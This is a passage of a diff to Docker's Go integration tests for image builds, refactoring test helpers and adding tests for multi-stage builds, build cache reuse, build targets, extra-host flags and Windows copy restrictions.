nobody") + dockerfile = "FFOM nobody\nRUN nobody" + result = buildImage(name, build.WithDockerfile(dockerfile)) + c.Assert(result.Error, checker.NotNil) + c.Assert(result.Stdout(), checker.Not(checker.Contains), "Step 1/2 : FROM busybox") + c.Assert(result.Stdout(), checker.Not(checker.Contains), "Step 2/2 : RUN nobody") +} + +func (s *DockerSuite) TestBuildCacheFromEqualDiffIDsLength(c *check.C) { + dockerfile := ` + FROM busybox + RUN echo "test" + ENTRYPOINT ["sh"]` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "Dockerfile": dockerfile, + })) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, "build1") + + // rebuild with cache-from + result := cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, "build2") + c.Assert(id1, checker.Equals, id2) + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 2) } func (s *DockerSuite) TestBuildCacheFrom(c *check.C) { @@ -7081,29 +5416,30 @@ func (s *DockerSuite) TestBuildCacheFrom(c *check.C) { ENV FOO=bar ADD baz / RUN touch bax` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": dockerfile, - "baz": "baz", - }) - c.Assert(err, checker.IsNil) + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "Dockerfile": dockerfile, + "baz": "baz", + })) defer ctx.Close() - id1, err := buildImageFromContext("build1", ctx, true) - c.Assert(err, checker.IsNil) + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, "build1") // rebuild with cache-from - id2, out, err := buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1") - c.Assert(err, checker.IsNil) + result := cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx)) + id2 := 
getIDByName(c, "build2") c.Assert(id1, checker.Equals, id2) - c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3) - dockerCmd(c, "rmi", "build2") + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 3) + cli.DockerCmd(c, "rmi", "build2") // no cache match with unknown source - id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=nosuchtag") - c.Assert(err, checker.IsNil) + result = cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=nosuchtag"), build.WithExternalBuildContext(ctx)) + id2 = getIDByName(c, "build2") c.Assert(id1, checker.Not(checker.Equals), id2) - c.Assert(strings.Count(out, "Using cache"), checker.Equals, 0) - dockerCmd(c, "rmi", "build2") + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 0) + cli.DockerCmd(c, "rmi", "build2") // clear parent images tempDir, err := ioutil.TempDir("", "test-build-cache-from-") @@ -7112,31 +5448,31 @@ func (s *DockerSuite) TestBuildCacheFrom(c *check.C) { } defer os.RemoveAll(tempDir) tempFile := filepath.Join(tempDir, "img.tar") - dockerCmd(c, "save", "-o", tempFile, "build1") - dockerCmd(c, "rmi", "build1") - dockerCmd(c, "load", "-i", tempFile) - parentID, _ := dockerCmd(c, "inspect", "-f", "{{.Parent}}", "build1") + cli.DockerCmd(c, "save", "-o", tempFile, "build1") + cli.DockerCmd(c, "rmi", "build1") + cli.DockerCmd(c, "load", "-i", tempFile) + parentID := cli.DockerCmd(c, "inspect", "-f", "{{.Parent}}", "build1").Combined() c.Assert(strings.TrimSpace(parentID), checker.Equals, "") // cache still applies without parents - id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1") - c.Assert(err, checker.IsNil) + result = cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx)) + id2 = getIDByName(c, "build2") c.Assert(id1, checker.Equals, id2) - c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3) - history1, _ := dockerCmd(c, "history", 
"-q", "build2") + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 3) + history1 := cli.DockerCmd(c, "history", "-q", "build2").Combined() // Retry, no new intermediate images - id3, out, err := buildImageFromContextWithOut("build3", ctx, true, "--cache-from=build1") - c.Assert(err, checker.IsNil) + result = cli.BuildCmd(c, "build3", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx)) + id3 := getIDByName(c, "build3") c.Assert(id1, checker.Equals, id3) - c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3) - history2, _ := dockerCmd(c, "history", "-q", "build3") + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 3) + history2 := cli.DockerCmd(c, "history", "-q", "build3").Combined() c.Assert(history1, checker.Equals, history2) - dockerCmd(c, "rmi", "build2") - dockerCmd(c, "rmi", "build3") - dockerCmd(c, "rmi", "build1") - dockerCmd(c, "load", "-i", tempFile) + cli.DockerCmd(c, "rmi", "build2") + cli.DockerCmd(c, "rmi", "build3") + cli.DockerCmd(c, "rmi", "build1") + cli.DockerCmd(c, "load", "-i", tempFile) // Modify file, everything up to last command and layers are reused dockerfile = ` @@ -7147,13 +5483,13 @@ func (s *DockerSuite) TestBuildCacheFrom(c *check.C) { err = ioutil.WriteFile(filepath.Join(ctx.Dir, "Dockerfile"), []byte(dockerfile), 0644) c.Assert(err, checker.IsNil) - id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1") - c.Assert(err, checker.IsNil) + result = cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx)) + id2 = getIDByName(c, "build2") c.Assert(id1, checker.Not(checker.Equals), id2) - c.Assert(strings.Count(out, "Using cache"), checker.Equals, 2) + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 2) - layers1Str, _ := dockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build1") - layers2Str, _ := dockerCmd(c, "inspect", "-f", "{{json 
.RootFS.Layers}}", "build2") + layers1Str := cli.DockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build1").Combined() + layers2Str := cli.DockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build2").Combined() var layers1 []string var layers2 []string @@ -7167,16 +5503,40 @@ func (s *DockerSuite) TestBuildCacheFrom(c *check.C) { c.Assert(layers1[len(layers1)-1], checker.Not(checker.Equals), layers2[len(layers1)-1]) } +func (s *DockerSuite) TestBuildMultiStageCache(c *check.C) { + testRequires(c, DaemonIsLinux) // All tests that do save are skipped in windows + dockerfile := ` + FROM busybox + ADD baz / + FROM busybox + ADD baz /` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "Dockerfile": dockerfile, + "baz": "baz", + })) + defer ctx.Close() + + result := cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + // second part of dockerfile was a repeat of first so should be cached + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 1) + + result = cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx)) + // now both parts of dockerfile should be cached + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 2) +} + func (s *DockerSuite) TestBuildNetNone(c *check.C) { testRequires(c, DaemonIsLinux) - name := "testbuildnetnone" - _, out, err := buildImageWithOut(name, ` + buildImage(name, cli.WithFlags("--network=none"), build.WithDockerfile(` FROM busybox RUN ping -c 1 8.8.8.8 - `, true, "--network=none") - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "unreachable") + `)).Assert(c, icmd.Expected{ + ExitCode: 1, + Out: "unreachable", + }) } func (s *DockerSuite) TestBuildNetContainer(c *check.C) { @@ -7185,85 +5545,446 @@ func (s *DockerSuite) TestBuildNetContainer(c *check.C) { id, _ := dockerCmd(c, "run", "--hostname", "foobar", "-d", "busybox", "nc", "-ll", "-p", 
"1234", "-e", "hostname") name := "testbuildnetcontainer" - out, err := buildImage(name, ` + buildImageSuccessfully(c, name, cli.WithFlags("--network=container:"+strings.TrimSpace(id)), + build.WithDockerfile(` FROM busybox RUN nc localhost 1234 > /otherhost - `, true, "--network=container:"+strings.TrimSpace(id)) - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + `)) host, _ := dockerCmd(c, "run", "testbuildnetcontainer", "cat", "/otherhost") c.Assert(strings.TrimSpace(host), check.Equals, "foobar") } -func (s *DockerSuite) TestBuildSquashParent(c *check.C) { - testRequires(c, ExperimentalDaemon) - dockerFile := ` +func (s *DockerSuite) TestBuildWithExtraHost(c *check.C) { + testRequires(c, DaemonIsLinux) + + name := "testbuildwithextrahost" + buildImageSuccessfully(c, name, + cli.WithFlags( + "--add-host", "foo:127.0.0.1", + "--add-host", "bar:127.0.0.1", + ), + build.WithDockerfile(` + FROM busybox + RUN ping -c 1 foo + RUN ping -c 1 bar + `)) +} + +func (s *DockerSuite) TestBuildWithExtraHostInvalidFormat(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerfile := ` FROM busybox - RUN echo hello > /hello - RUN echo world >> /hello - RUN echo hello > /remove_me - ENV HELLO world - RUN rm /remove_me - ` - // build and get the ID that we can use later for history comparison - origID, err := buildImage("test", dockerFile, false) - c.Assert(err, checker.IsNil) + RUN ping -c 1 foo` - // build with squash - id, err := buildImage("test", dockerFile, true, "--squash") - c.Assert(err, checker.IsNil) + testCases := []struct { + testName string + dockerfile string + buildFlag string + }{ + {"extra_host_missing_ip", dockerfile, "--add-host=foo"}, + {"extra_host_missing_ip_with_delimiter", dockerfile, "--add-host=foo:"}, + {"extra_host_missing_hostname", dockerfile, "--add-host=:127.0.0.1"}, + {"extra_host_invalid_ipv4", dockerfile, "--add-host=foo:101.10.2"}, + {"extra_host_invalid_ipv6", dockerfile, "--add-host=foo:2001::1::3F"}, + } - out, _ := 
dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", "cat /hello") - c.Assert(strings.TrimSpace(out), checker.Equals, "hello\nworld") + for _, tc := range testCases { + result := buildImage(tc.testName, cli.WithFlags(tc.buildFlag), build.WithDockerfile(tc.dockerfile)) + result.Assert(c, icmd.Expected{ + ExitCode: 125, + }) + } - dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", "[ ! -f /remove_me ]") - dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", `[ "$(echo $HELLO)" == "world" ]`) +} - // make sure the ID produced is the ID of the tag we specified - inspectID, err := inspectImage("test", ".ID") - c.Assert(err, checker.IsNil) - c.Assert(inspectID, checker.Equals, id) +func (s *DockerSuite) TestBuildContChar(c *check.C) { + name := "testbuildcontchar" - origHistory, _ := dockerCmd(c, "history", origID) - testHistory, _ := dockerCmd(c, "history", "test") + buildImage(name, build.WithDockerfile(`FROM busybox\`)).Assert(c, icmd.Expected{ + Out: "Step 1/1 : FROM busybox", + }) - splitOrigHistory := strings.Split(strings.TrimSpace(origHistory), "\n") - splitTestHistory := strings.Split(strings.TrimSpace(testHistory), "\n") - c.Assert(len(splitTestHistory), checker.Equals, len(splitOrigHistory)+1) + result := buildImage(name, build.WithDockerfile(`FROM busybox + RUN echo hi \`)) + result.Assert(c, icmd.Success) + c.Assert(result.Combined(), checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(result.Combined(), checker.Contains, "Step 2/2 : RUN echo hi\n") - out, err = inspectImage(id, "len .RootFS.Layers") - c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Equals, "3") + result = buildImage(name, build.WithDockerfile(`FROM busybox + RUN echo hi \\`)) + result.Assert(c, icmd.Success) + c.Assert(result.Combined(), checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(result.Combined(), checker.Contains, "Step 2/2 : RUN echo hi \\\n") + + result = buildImage(name, build.WithDockerfile(`FROM busybox + RUN echo hi \\\`)) + result.Assert(c, 
icmd.Success) + c.Assert(result.Combined(), checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(result.Combined(), checker.Contains, "Step 2/2 : RUN echo hi \\\\\n") } -func (s *DockerSuite) TestBuildContChar(c *check.C) { - name := "testbuildcontchar" +func (s *DockerSuite) TestBuildMultiStageCopyFromSyntax(c *check.C) { + dockerfile := ` + FROM busybox AS first + COPY foo bar - _, out, err := buildImageWithOut(name, - `FROM busybox\`, true) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "Step 1/1 : FROM busybox") + FROM busybox + %s + COPY baz baz + RUN echo mno > baz/cc - _, out, err = buildImageWithOut(name, - `FROM busybox - RUN echo hi \`, true) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox") - c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi\n") + FROM busybox + COPY bar / + COPY --from=1 baz sub/ + COPY --from=0 bar baz + COPY --from=first bar bay` + + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(fmt.Sprintf(dockerfile, "")), + fakecontext.WithFiles(map[string]string{ + "foo": "abc", + "bar": "def", + "baz/aa": "ghi", + "baz/bb": "jkl", + })) + defer ctx.Close() - _, out, err = buildImageWithOut(name, - `FROM busybox - RUN echo hi \\`, true) + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + + cli.DockerCmd(c, "run", "build1", "cat", "bar").Assert(c, icmd.Expected{Out: "def"}) + cli.DockerCmd(c, "run", "build1", "cat", "sub/aa").Assert(c, icmd.Expected{Out: "ghi"}) + cli.DockerCmd(c, "run", "build1", "cat", "sub/cc").Assert(c, icmd.Expected{Out: "mno"}) + cli.DockerCmd(c, "run", "build1", "cat", "baz").Assert(c, icmd.Expected{Out: "abc"}) + cli.DockerCmd(c, "run", "build1", "cat", "bay").Assert(c, icmd.Expected{Out: "abc"}) + + result := cli.BuildCmd(c, "build2", build.WithExternalBuildContext(ctx)) + + // all commands should be cached + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 7) + c.Assert(getIDByName(c, "build1"), 
checker.Equals, getIDByName(c, "build2")) + + err := ioutil.WriteFile(filepath.Join(ctx.Dir, "Dockerfile"), []byte(fmt.Sprintf(dockerfile, "COPY baz/aa foo")), 0644) c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox") - c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi \\\n") - _, out, err = buildImageWithOut(name, - `FROM busybox - RUN echo hi \\\`, true) + // changing file in parent block should not affect last block + result = cli.BuildCmd(c, "build3", build.WithExternalBuildContext(ctx)) + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 5) + + err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("pqr"), 0644) c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox") - c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi \\\\\n") + + // changing file in parent block should affect both first and last block + result = cli.BuildCmd(c, "build4", build.WithExternalBuildContext(ctx)) + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 5) + + cli.DockerCmd(c, "run", "build4", "cat", "bay").Assert(c, icmd.Expected{Out: "pqr"}) + cli.DockerCmd(c, "run", "build4", "cat", "baz").Assert(c, icmd.Expected{Out: "pqr"}) +} + +func (s *DockerSuite) TestBuildMultiStageCopyFromErrors(c *check.C) { + testCases := []struct { + dockerfile string + expectedError string + }{ + { + dockerfile: ` + FROM busybox + COPY --from=foo foo bar`, + expectedError: "invalid from flag value foo", + }, + { + dockerfile: ` + FROM busybox + COPY --from=0 foo bar`, + expectedError: "invalid from flag value 0: refers to current build stage", + }, + { + dockerfile: ` + FROM busybox AS foo + COPY --from=bar foo bar`, + expectedError: "invalid from flag value bar", + }, + { + dockerfile: ` + FROM busybox AS 1 + COPY --from=1 foo bar`, + expectedError: "invalid name for build stage", + }, + } + + for _, tc := range testCases { + ctx := fakecontext.New(c, "", + 
fakecontext.WithDockerfile(tc.dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "abc", + })) + + cli.Docker(cli.Build("build1"), build.WithExternalBuildContext(ctx)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: tc.expectedError, + }) + + ctx.Close() + } +} + +func (s *DockerSuite) TestBuildMultiStageMultipleBuilds(c *check.C) { + dockerfile := ` + FROM busybox + COPY foo bar` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "abc", + })) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + + dockerfile = ` + FROM build1:latest AS foo + FROM busybox + COPY --from=foo bar / + COPY foo /` + ctx = fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "def", + })) + defer ctx.Close() + + cli.BuildCmd(c, "build2", build.WithExternalBuildContext(ctx)) + + out := cli.DockerCmd(c, "run", "build2", "cat", "bar").Combined() + c.Assert(strings.TrimSpace(out), check.Equals, "abc") + out = cli.DockerCmd(c, "run", "build2", "cat", "foo").Combined() + c.Assert(strings.TrimSpace(out), check.Equals, "def") +} + +func (s *DockerSuite) TestBuildMultiStageImplicitFrom(c *check.C) { + dockerfile := ` + FROM busybox + COPY --from=busybox /etc/passwd /mypasswd + RUN cmp /etc/passwd /mypasswd` + + if DaemonIsWindows() { + dockerfile = ` + FROM busybox + COPY --from=busybox License.txt foo` + } + + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + ) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + + if DaemonIsWindows() { + out := cli.DockerCmd(c, "run", "build1", "cat", "License.txt").Combined() + c.Assert(len(out), checker.GreaterThan, 10) + out2 := cli.DockerCmd(c, "run", "build1", "cat", "foo").Combined() + c.Assert(out, check.Equals, out2) + } +} + +func (s *DockerRegistrySuite) TestBuildMultiStageImplicitPull(c *check.C) { + repoName 
:= fmt.Sprintf("%v/dockercli/testf", privateRegistryURL) + + dockerfile := ` + FROM busybox + COPY foo bar` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "abc", + })) + defer ctx.Close() + + cli.BuildCmd(c, repoName, build.WithExternalBuildContext(ctx)) + + cli.DockerCmd(c, "push", repoName) + cli.DockerCmd(c, "rmi", repoName) + + dockerfile = ` + FROM busybox + COPY --from=%s bar baz` + + ctx = fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(dockerfile, repoName))) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + + cli.Docker(cli.Args("run", "build1", "cat", "baz")).Assert(c, icmd.Expected{Out: "abc"}) +} + +func (s *DockerSuite) TestBuildMultiStageNameVariants(c *check.C) { + dockerfile := ` + FROM busybox as foo + COPY foo / + FROM foo as foo1 + RUN echo 1 >> foo + FROM foo as foO2 + RUN echo 2 >> foo + FROM foo + COPY --from=foo1 foo f1 + COPY --from=FOo2 foo f2 + ` // foo2 case also tests that names are case insensitive + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "bar", + })) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + cli.Docker(cli.Args("run", "build1", "cat", "foo")).Assert(c, icmd.Expected{Out: "bar"}) + cli.Docker(cli.Args("run", "build1", "cat", "f1")).Assert(c, icmd.Expected{Out: "bar1"}) + cli.Docker(cli.Args("run", "build1", "cat", "f2")).Assert(c, icmd.Expected{Out: "bar2"}) +} + +func (s *DockerSuite) TestBuildMultiStageMultipleBuildsWindows(c *check.C) { + testRequires(c, DaemonIsWindows) + dockerfile := ` + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + COPY foo c:\\bar` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "abc", + })) + defer ctx.Close() + + cli.BuildCmd(c, "build1", 
build.WithExternalBuildContext(ctx)) + + dockerfile = ` + FROM build1:latest + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + COPY --from=0 c:\\bar / + COPY foo /` + ctx = fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "def", + })) + defer ctx.Close() + + cli.BuildCmd(c, "build2", build.WithExternalBuildContext(ctx)) + + out := cli.DockerCmd(c, "run", "build2", "cmd.exe", "/s", "/c", "type", "c:\\bar").Combined() + c.Assert(strings.TrimSpace(out), check.Equals, "abc") + out = cli.DockerCmd(c, "run", "build2", "cmd.exe", "/s", "/c", "type", "c:\\foo").Combined() + c.Assert(strings.TrimSpace(out), check.Equals, "def") +} + +func (s *DockerSuite) TestBuildCopyFromForbidWindowsSystemPaths(c *check.C) { + testRequires(c, DaemonIsWindows) + dockerfile := ` + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + COPY --from=0 %s c:\\oscopy + ` + exp := icmd.Expected{ + ExitCode: 1, + Err: "copy from c:\\ or c:\\windows is not allowed on windows", + } + buildImage("testforbidsystempaths1", build.WithDockerfile(fmt.Sprintf(dockerfile, "c:\\\\"))).Assert(c, exp) + buildImage("testforbidsystempaths2", build.WithDockerfile(fmt.Sprintf(dockerfile, "C:\\\\"))).Assert(c, exp) + buildImage("testforbidsystempaths3", build.WithDockerfile(fmt.Sprintf(dockerfile, "c:\\\\windows"))).Assert(c, exp) + buildImage("testforbidsystempaths4", build.WithDockerfile(fmt.Sprintf(dockerfile, "c:\\\\wInDows"))).Assert(c, exp) +} + +func (s *DockerSuite) TestBuildCopyFromForbidWindowsRelativePaths(c *check.C) { + testRequires(c, DaemonIsWindows) + dockerfile := ` + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + COPY --from=0 %s c:\\oscopy + ` + exp := icmd.Expected{ + ExitCode: 1, + Err: "copy from c:\\ or c:\\windows is not allowed on windows", + } + buildImage("testforbidsystempaths1", 
build.WithDockerfile(fmt.Sprintf(dockerfile, "c:"))).Assert(c, exp) + buildImage("testforbidsystempaths2", build.WithDockerfile(fmt.Sprintf(dockerfile, "."))).Assert(c, exp) + buildImage("testforbidsystempaths3", build.WithDockerfile(fmt.Sprintf(dockerfile, "..\\\\"))).Assert(c, exp) + buildImage("testforbidsystempaths4", build.WithDockerfile(fmt.Sprintf(dockerfile, ".\\\\windows"))).Assert(c, exp) + buildImage("testforbidsystempaths5", build.WithDockerfile(fmt.Sprintf(dockerfile, "\\\\windows"))).Assert(c, exp) +} + +func (s *DockerSuite) TestBuildCopyFromWindowsIsCaseInsensitive(c *check.C) { + testRequires(c, DaemonIsWindows) + dockerfile := ` + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + COPY foo / + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + COPY --from=0 c:\\fOo c:\\copied + RUN type c:\\copied + ` + cli.Docker(cli.Build("copyfrom-windows-insensitive"), build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("foo", "hello world"), + )).Assert(c, icmd.Expected{ + ExitCode: 0, + Out: "hello world", + }) +} + +// #33176 +func (s *DockerSuite) TestBuildMulitStageResetScratch(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerfile := ` + FROM busybox + WORKDIR /foo/bar + FROM scratch + ENV FOO=bar + ` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + ) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + + res := cli.InspectCmd(c, "build1", cli.Format(".Config.WorkingDir")).Combined() + c.Assert(strings.TrimSpace(res), checker.Equals, "") +} + +func (s *DockerSuite) TestBuildIntermediateTarget(c *check.C) { + //todo: need to be removed after 18.06 release + if strings.Contains(testEnv.DaemonInfo.ServerVersion, "18.05.0") { + c.Skip(fmt.Sprintf("Bug fixed in 18.06 or higher.Skipping it for %s", testEnv.DaemonInfo.ServerVersion)) + } + dockerfile := ` + FROM busybox AS build-env + CMD ["/dev"] + FROM busybox + CMD ["/dist"] + ` + ctx := fakecontext.New(c, 
"", fakecontext.WithDockerfile(dockerfile)) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx), + cli.WithFlags("--target", "build-env")) + + res := cli.InspectCmd(c, "build1", cli.Format("json .Config.Cmd")).Combined() + c.Assert(strings.TrimSpace(res), checker.Equals, `["/dev"]`) + + // Stage name is case-insensitive by design + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx), + cli.WithFlags("--target", "BUIld-EnV")) + + res = cli.InspectCmd(c, "build1", cli.Format("json .Config.Cmd")).Combined() + c.Assert(strings.TrimSpace(res), checker.Equals, `["/dev"]`) + + result := cli.Docker(cli.Build("build1"), build.WithExternalBuildContext(ctx), + cli.WithFlags("--target", "nosuchtarget")) + result.Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "failed to reach build target", + }) } // TestBuildOpaqueDirectory tests that a build succeeds which @@ -7271,7 +5992,6 @@ func (s *DockerSuite) TestBuildContChar(c *check.C) { // See https://github.com/docker/docker/issues/25244 func (s *DockerSuite) TestBuildOpaqueDirectory(c *check.C) { testRequires(c, DaemonIsLinux) - dockerFile := ` FROM busybox RUN mkdir /dir1 && touch /dir1/f1 @@ -7279,28 +5999,22 @@ func (s *DockerSuite) TestBuildOpaqueDirectory(c *check.C) { RUN touch /dir1/f3 RUN [ -f /dir1/f2 ] ` - // Test that build succeeds, last command fails if opaque directory // was not handled correctly - _, err := buildImage("testopaquedirectory", dockerFile, false) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, "testopaquedirectory", build.WithDockerfile(dockerFile)) } // Windows test for USER in dockerfile func (s *DockerSuite) TestBuildWindowsUser(c *check.C) { testRequires(c, DaemonIsWindows) name := "testbuildwindowsuser" - _, out, err := buildImageWithOut(name, - `FROM `+WindowsBaseImage+` + buildImage(name, build.WithDockerfile(`FROM `+testEnv.PlatformDefaults.BaseImage+` RUN net user user /add USER user RUN set username - `, - true) - if err != nil { - 
c.Fatal(err) - } - c.Assert(strings.ToLower(out), checker.Contains, "username=user") + `)).Assert(c, icmd.Expected{ + Out: "USERNAME=user", + }) } // Verifies if COPY file . when WORKDIR is set to a non-existing directory, @@ -7310,83 +6024,186 @@ func (s *DockerSuite) TestBuildWindowsUser(c *check.C) { // Note 27545 was reverted in 28505, but a new fix was added subsequently in 28514. func (s *DockerSuite) TestBuildCopyFileDotWithWorkdir(c *check.C) { name := "testbuildcopyfiledotwithworkdir" - ctx, err := fakeContext(`FROM busybox -WORKDIR /foo -COPY file . -RUN ["cat", "/foo/file"] -`, - map[string]string{}) - - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if err := ctx.Add("file", "content"); err != nil { - c.Fatal(err) - } - - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox +WORKDIR /foo +COPY file . +RUN ["cat", "/foo/file"] +`), + build.WithFile("file", "content"), + )) } // Case-insensitive environment variables on Windows func (s *DockerSuite) TestBuildWindowsEnvCaseInsensitive(c *check.C) { testRequires(c, DaemonIsWindows) name := "testbuildwindowsenvcaseinsensitive" - if _, err := buildImage(name, ` - FROM `+WindowsBaseImage+` - ENV FOO=bar foo=bar - `, true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(` + FROM `+testEnv.PlatformDefaults.BaseImage+` + ENV FOO=bar foo=baz + `)) res := inspectFieldJSON(c, name, "Config.Env") - if res != `["foo=bar"]` { // Should not have FOO=bar in it - takes the last one processed. And only one entry as deduped. + if res != `["foo=baz"]` { // Should not have FOO=bar in it - takes the last one processed. And only one entry as deduped. c.Fatalf("Case insensitive environment variables on Windows failed. 
Got %s", res) } } // Test case for 29667 func (s *DockerSuite) TestBuildWorkdirImageCmd(c *check.C) { - testRequires(c, DaemonIsLinux) - image := "testworkdirimagecmd" - dockerfile := ` + buildImageSuccessfully(c, image, build.WithDockerfile(` FROM busybox WORKDIR /foo/bar -` - out, err := buildImage(image, dockerfile, true) - c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) +`)) + out, _ := dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image) - out, _ = dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image) - c.Assert(strings.TrimSpace(out), checker.Equals, `["sh"]`) + // The Windows busybox image has a blank `cmd` + lookingFor := `["sh"]` + if testEnv.OSType == "windows" { + lookingFor = "null" + } + c.Assert(strings.TrimSpace(out), checker.Equals, lookingFor) image = "testworkdirlabelimagecmd" - dockerfile = ` + buildImageSuccessfully(c, image, build.WithDockerfile(` FROM busybox WORKDIR /foo/bar LABEL a=b -` - out, err = buildImage(image, dockerfile, true) - c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) +`)) out, _ = dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image) - c.Assert(strings.TrimSpace(out), checker.Equals, `["sh"]`) + c.Assert(strings.TrimSpace(out), checker.Equals, lookingFor) } -// Test case for 28902/28090 +// Test case for 28902/28909 func (s *DockerSuite) TestBuildWorkdirCmd(c *check.C) { testRequires(c, DaemonIsLinux) - + name := "testbuildworkdircmd" dockerFile := ` - FROM golang:1.7-alpine + FROM busybox WORKDIR / ` - _, err := buildImage("testbuildworkdircmd", dockerFile, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, name, 